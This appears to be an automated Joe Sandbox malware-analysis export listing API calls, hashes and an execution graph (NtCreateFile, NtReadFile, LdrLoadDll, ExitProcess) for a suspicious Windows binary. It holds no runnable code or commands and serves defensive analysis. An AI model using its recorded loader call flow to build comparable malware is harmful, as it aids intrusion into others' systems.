                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SwitchThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 115865932-0
                                                                                                                                                                        • Opcode ID: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
                                                                                                                                                                        • Instruction ID: 146e80ab63406fb7adc23e35b8f725c4d9391c2b8d6ec2dd276df948bb77ce5a
                                                                                                                                                                        • Opcode Fuzzy Hash: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
                                                                                                                                                                        • Instruction Fuzzy Hash: 03418133B29686C5EBA58E29D050A7D73D0EB40B94F54D13ADB4EC6BC9DEBCE4408790
                                                                                                                                                                        APIs
                                                                                                                                                                        • DebugBreak.KERNEL32(?,00000000,?,00007FF67FA5E7B5,?,?,0000000100000001,00007FF67FA6CA48), ref: 00007FF67FA80F49
                                                                                                                                                                        • DebugBreak.KERNEL32(?,00000000,?,00007FF67FA5E7B5,?,?,0000000100000001,00007FF67FA6CA48), ref: 00007FF67FA80F66
                                                                                                                                                                        • DebugBreak.KERNEL32(?,00000000,?,00007FF67FA5E7B5,?,?,0000000100000001,00007FF67FA6CA48), ref: 00007FF67FA80F81
                                                                                                                                                                        • DebugBreak.KERNEL32(?,00000000,?,00007FF67FA5E7B5,?,?,0000000100000001,00007FF67FA6CA48), ref: 00007FF67FA80F9A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 456121617-0
                                                                                                                                                                        • Opcode ID: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
                                                                                                                                                                        • Instruction ID: dfafc197cb613c82cc78525ff204b919027d2d44d9ccfb94df65c2fda0075649
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41C523A2D6C2C5EA629B119140B7A67E0EF44B54F19D434DE4C87395DFBCE881C3D0
                                                                                                                                                                        APIs
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,00000000,?,00007FF67FA6B16E,?,?,-8000000000000000,00007FF67FA7E9AE,?,?,?,00007FF67FA588C3), ref: 00007FF67FA6F339
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,00000000,?,00007FF67FA6B16E,?,?,-8000000000000000,00007FF67FA7E9AE,?,?,?,00007FF67FA588C3), ref: 00007FF67FA6F356
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,00000000,?,00007FF67FA6B16E,?,?,-8000000000000000,00007FF67FA7E9AE,?,?,?,00007FF67FA588C3), ref: 00007FF67FA6F376
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,00000000,?,00007FF67FA6B16E,?,?,-8000000000000000,00007FF67FA7E9AE,?,?,?,00007FF67FA588C3), ref: 00007FF67FA6F399
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 456121617-0
                                                                                                                                                                        • Opcode ID: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
                                                                                                                                                                        • Instruction ID: bf87684582f42af4d6fe1b8566fe00bc2fd638f279474d5c3a1995ba801908a2
                                                                                                                                                                        • Opcode Fuzzy Hash: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
                                                                                                                                                                        • Instruction Fuzzy Hash: BB31E563619743C2EA659F29A040A79B7A4FF45B94F180034EA6D8B785FF3CD480C3C0
                                                                                                                                                                        APIs
                                                                                                                                                                        • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67FA453F1), ref: 00007FF67FA4B554
                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67FA453F1), ref: 00007FF67FA4B55E
                                                                                                                                                                        • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67FA453F1), ref: 00007FF67FA4B57D
                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67FA453F1), ref: 00007FF67FA4B591
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastMultipleWait$HandlesObjects
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2817213684-0
                                                                                                                                                                        • Opcode ID: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
                                                                                                                                                                        • Instruction ID: 212061513c02a8481288ff2db5a97c794ff5ea867ee6e467ecf22bd8b0edc613
                                                                                                                                                                        • Opcode Fuzzy Hash: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
                                                                                                                                                                        • Instruction Fuzzy Hash: D111733262C755C6D7144B6DF44093AB365FB85B90F140135FA9E93B95CF7CD4448B80
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                        • Opcode ID: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
                                                                                                                                                                        • Instruction ID: 5affee06e3726e4dd418f078997683a1be39354dbe6a9f7c68d2edb9300698bf
                                                                                                                                                                        • Opcode Fuzzy Hash: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
                                                                                                                                                                        • Instruction Fuzzy Hash: 20112122B24F018AEF00CF60E8546B933A4F75AB58F440E35DA9D877A4DF7CD1948380
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FAAB963), ref: 00007FF67FAAC6A8
                                                                                                                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FAAB963), ref: 00007FF67FAAC6E9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                        • String ID: csm
                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                        • Opcode ID: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
                                                                                                                                                                        • Instruction ID: 936c921d35478e610dc2a6dad5d8a63eaaeee0c6b3cca087140b4fdd9a5ff715
                                                                                                                                                                        • Opcode Fuzzy Hash: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
                                                                                                                                                                        • Instruction Fuzzy Hash: D0112B33628B8182EB61CF15F440669B7E4FB88B84F586231DE8D47768EF3CD5558B40
                                                                                                                                                                        APIs
                                                                                                                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF67FA4C313,?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4D08B
                                                                                                                                                                        • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF67FA4C313,?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4D0C8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmpstrtoull
                                                                                                                                                                        • String ID: HeapVerify
                                                                                                                                                                        • API String ID: 4031153986-2674988305
                                                                                                                                                                        • Opcode ID: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
                                                                                                                                                                        • Instruction ID: 5dd4b44f682b7a5bc443e9471970ebd26f1e2db82aec32d09ba76ebacf814cb3
                                                                                                                                                                        • Opcode Fuzzy Hash: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
                                                                                                                                                                        • Instruction Fuzzy Hash: DD015232A29A42D9EB50AF15E9804B973E0FB99B80F549135DA4E83B59CF3DD442C6C0
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF67FA5D6BF,01FFF001,00000000,00000000,00007FF67FA6BD4F), ref: 00007FF67FA732ED
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF67FA5D6BF,01FFF001,00000000,00000000,00007FF67FA6BD4F), ref: 00007FF67FA7333E
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF67FA5D6BF,01FFF001,00000000,00000000,00007FF67FA6BD4F), ref: 00007FF67FA73374
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF67FA5D6BF,01FFF001,00000000,00000000,00007FF67FA6BD4F), ref: 00007FF67FA7338F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
                                                                                                                                                                        • Instruction ID: 075d976460104eb2688db1349c80442c5f23ed6fdc496670798fda2af33ea9b0
                                                                                                                                                                        • Opcode Fuzzy Hash: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
                                                                                                                                                                        • Instruction Fuzzy Hash: 30417C63E2C782C1EA208F15E840F7A7390AB56B98F544236DA5DC7A99CF3CE585D3D0
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67FA6419F,?,?,?,00007FF67FA71E7B), ref: 00007FF67FA6406A
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67FA6419F,?,?,?,00007FF67FA71E7B), ref: 00007FF67FA640AC
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67FA6419F,?,?,?,00007FF67FA71E7B), ref: 00007FF67FA640D7
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67FA6419F,?,?,?,00007FF67FA71E7B), ref: 00007FF67FA640F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
                                                                                                                                                                        • Instruction ID: 62c015cdd23716da8fd3cad44bc5ee171dcf6b68913673f268dd1d3051a11d92
                                                                                                                                                                        • Opcode Fuzzy Hash: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
                                                                                                                                                                        • Instruction Fuzzy Hash: A82144A3A2894281EA10CB14E880BB52350EF61BA8F986336D92CC25D5DF7CE595C381

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:1.6%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:5.4%
                                                                                                                                                                        Signature Coverage:8.1%
                                                                                                                                                                        Total number of Nodes:570
                                                                                                                                                                        Total number of Limit Nodes:71
                                                                                                                                                                        execution_graph 93432 5602ad0 LdrInitializeThunk 93433 41f0f0 93436 41b970 93433->93436 93437 41b996 93436->93437 93444 409d40 93437->93444 93439 41b9a2 93443 41b9c3 93439->93443 93452 40c1c0 93439->93452 93441 41b9b5 93488 41a6b0 93441->93488 93491 409c90 93444->93491 93446 409d4d 93447 409d54 93446->93447 93503 409c30 93446->93503 93447->93439 93453 40c1e5 93452->93453 93920 40b1c0 93453->93920 93455 40c23c 93924 40ae40 93455->93924 93457 40c4b3 93457->93441 93458 40c262 93458->93457 93933 4143a0 93458->93933 93460 40c2a7 93460->93457 93936 408a60 93460->93936 93462 40c2eb 93462->93457 93943 41a500 93462->93943 93466 40c341 93467 40c348 93466->93467 93955 41a010 93466->93955 93469 41bdc0 2 API calls 93467->93469 93471 40c355 93469->93471 93471->93441 93472 40c392 93473 41bdc0 2 API calls 93472->93473 93474 40c399 93473->93474 93474->93441 93475 40c3a2 93476 40f4a0 3 API calls 93475->93476 93477 40c416 93476->93477 93477->93467 93478 40c421 93477->93478 93479 41bdc0 2 API calls 93478->93479 93480 40c445 93479->93480 93961 41a060 93480->93961 93483 41a010 2 API calls 93484 40c480 93483->93484 93484->93457 93966 419e20 93484->93966 93487 41a6b0 2 API calls 93487->93457 93489 41af60 LdrLoadDll 93488->93489 93490 41a6cf ExitProcess 93489->93490 93490->93443 93492 409ca3 93491->93492 93542 418bc0 LdrLoadDll 93491->93542 93522 418a70 93492->93522 93495 409cb6 93495->93446 93496 409cac 93496->93495 93525 41b2b0 93496->93525 93498 409cf3 93498->93495 93536 409ab0 93498->93536 93500 409d13 93543 409620 LdrLoadDll 93500->93543 93502 409d25 93502->93446 93895 41b5a0 93503->93895 93506 41b5a0 LdrLoadDll 93507 409c5b 93506->93507 93508 41b5a0 LdrLoadDll 93507->93508 93509 409c71 93508->93509 93510 40f180 93509->93510 93511 40f199 93510->93511 93903 40b040 93511->93903 93513 40f1ac 93907 41a1e0 93513->93907 93516 409d65 93516->93439 93518 40f1d2 93519 40f1fd 93518->93519 93913 41a260 93518->93913 93520 41a490 2 API calls 93519->93520 93520->93516 93544 41a600 93522->93544 93526 41b2c9 93525->93526 93557 414a50 93526->93557 93528 41b2e1 93529 41b2ea 93528->93529 93596 41b0f0 93528->93596 93529->93498 93531 41b2fe 93531->93529 93614 419f00 93531->93614 93873 407ea0 93536->93873 93538 409ad1 93538->93500 93539 409aca 93539->93538 93886 408160 93539->93886 93542->93492 93543->93502 93547 41af60 93544->93547 93546 418a85 93546->93496 93548 41af70 93547->93548 93550 41af92 93547->93550 93551 414e50 93548->93551 93550->93546 93552 414e5e 93551->93552 93553 414e6a 93551->93553 93552->93553 93556 4152d0 LdrLoadDll 93552->93556 93553->93550 93555 414fbc 93555->93550 93556->93555 93558 414d85 93557->93558 93560 414a64 93557->93560 93558->93528 93560->93558 93622 419c50 93560->93622 93562 414b90 93625 41a360 93562->93625 93563 414b73 93683 41a460 LdrLoadDll 93563->93683 93566 414bb7 93568 41bdc0 2 API calls 93566->93568 93567 414b7d 93567->93528 93570 414bc3 93568->93570 93569 414d49 93572 41a490 2 API calls 93569->93572 93570->93567 93570->93569 93571 414d5f 93570->93571 93576 414c52 93570->93576 93692 414790 LdrLoadDll NtReadFile NtClose 93571->93692 93574 414d50 93572->93574 93574->93528 93575 414d72 93575->93528 93577 414cb9 93576->93577 93579 414c61 93576->93579 93577->93569 93578 414ccc 93577->93578 93685 41a2e0 93578->93685 93581 414c66 93579->93581 93582 414c7a 93579->93582 93684 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 93581->93684 93585 414c97 93582->93585 93586 414c7f 93582->93586 93585->93574 93641 414410 93585->93641 93629 4146f0 93586->93629 93588 414c70 93588->93528 93591 414d2c 93689 41a490 93591->93689 93592 414c8d 93592->93528 93593 414caf 93593->93528 93595 414d38 93595->93528 93597 41b101 93596->93597 93598 41b113 93597->93598 93710 41bd40 93597->93710 93598->93531 93600 41b134 93713 414070 93600->93713 93602 41b180 93602->93531 93603 41b157 93603->93602 93604 414070 3 API calls 93603->93604 93606 41b179 93604->93606 93606->93602 93745 415390 93606->93745 93607 41b20a 93608 41b21a 93607->93608 93839 41af00 LdrLoadDll 93607->93839 93755 41ad70 93608->93755 93611 41b248 93834 419ec0 93611->93834 93615 419f1c 93614->93615 93616 41af60 LdrLoadDll 93614->93616 93867 5602c0a 93615->93867 93616->93615 93617 419f37 93619 41bdc0 93617->93619 93870 41a670 93619->93870 93621 41b359 93621->93498 93623 41af60 LdrLoadDll 93622->93623 93624 414b44 93623->93624 93624->93562 93624->93563 93624->93567 93626 41a37c NtCreateFile 93625->93626 93627 41af60 LdrLoadDll 93625->93627 93626->93566 93627->93626 93630 41470c 93629->93630 93631 41a2e0 LdrLoadDll 93630->93631 93632 41472d 93631->93632 93633 414734 93632->93633 93634 414748 93632->93634 93636 41a490 2 API calls 93633->93636 93635 41a490 2 API calls 93634->93635 93637 414751 93635->93637 93638 41473d 93636->93638 93693 41bfd0 LdrLoadDll RtlAllocateHeap 93637->93693 93638->93592 93640 41475c 93640->93592 93642 41445b 93641->93642 93643 41448e 93641->93643 93644 41a2e0 LdrLoadDll 93642->93644 93645 4145d9 93643->93645 93649 4144aa 93643->93649 93646 414476 93644->93646 93647 41a2e0 LdrLoadDll 93645->93647 93648 41a490 2 API calls 93646->93648 93655 4145f4 93647->93655 93650 41447f 93648->93650 93651 41a2e0 LdrLoadDll 93649->93651 93650->93593 93652 4144c5 93651->93652 93653 4144e1 93652->93653 93654 4144cc 93652->93654 93659 4144e6 93653->93659 93660 4144fc 93653->93660 93658 41a490 2 API calls 93654->93658 93706 41a320 LdrLoadDll 93655->93706 93657 41462e 93661 41a490 2 API calls 93657->93661 93662 4144d5 93658->93662 93663 41a490 2 API calls 93659->93663 93670 414501 93660->93670 93694 41bf90 93660->93694 93664 414639 93661->93664 93662->93593 93665 4144ef 93663->93665 93664->93593 93665->93593 93666 414513 93666->93593 93669 414567 93671 41457e 93669->93671 93705 41a2a0 LdrLoadDll 93669->93705 93670->93666 93697 41a410 93670->93697 93673 414585 93671->93673 93674 41459a 93671->93674 93675 41a490 2 API calls 93673->93675 93676 41a490 2 API calls 93674->93676 93675->93666 93677 4145a3 93676->93677 93678 4145cf 93677->93678 93700 41bb90 93677->93700 93678->93593 93680 4145ba 93681 41bdc0 2 API calls 93680->93681 93682 4145c3 93681->93682 93682->93593 93683->93567 93684->93588 93686 414d14 93685->93686 93687 41af60 LdrLoadDll 93685->93687 93688 41a320 LdrLoadDll 93686->93688 93687->93686 93688->93591 93690 41a4ac NtClose 93689->93690 93691 41af60 LdrLoadDll 93689->93691 93690->93595 93691->93690 93692->93575 93693->93640 93696 41bfa8 93694->93696 93707 41a630 93694->93707 93696->93670 93698 41a42c NtReadFile 93697->93698 93699 41af60 LdrLoadDll 93697->93699 93698->93669 93699->93698 93701 41bbb4 93700->93701 93702 41bb9d 93700->93702 93701->93680 93702->93701 93703 41bf90 2 API calls 93702->93703 93704 41bbcb 93703->93704 93704->93680 93705->93671 93706->93657 93708 41af60 LdrLoadDll 93707->93708 93709 41a64c RtlAllocateHeap 93708->93709 93709->93696 93840 41a540 93710->93840 93712 41bd6d 93712->93600 93714 414081 93713->93714 93716 414089 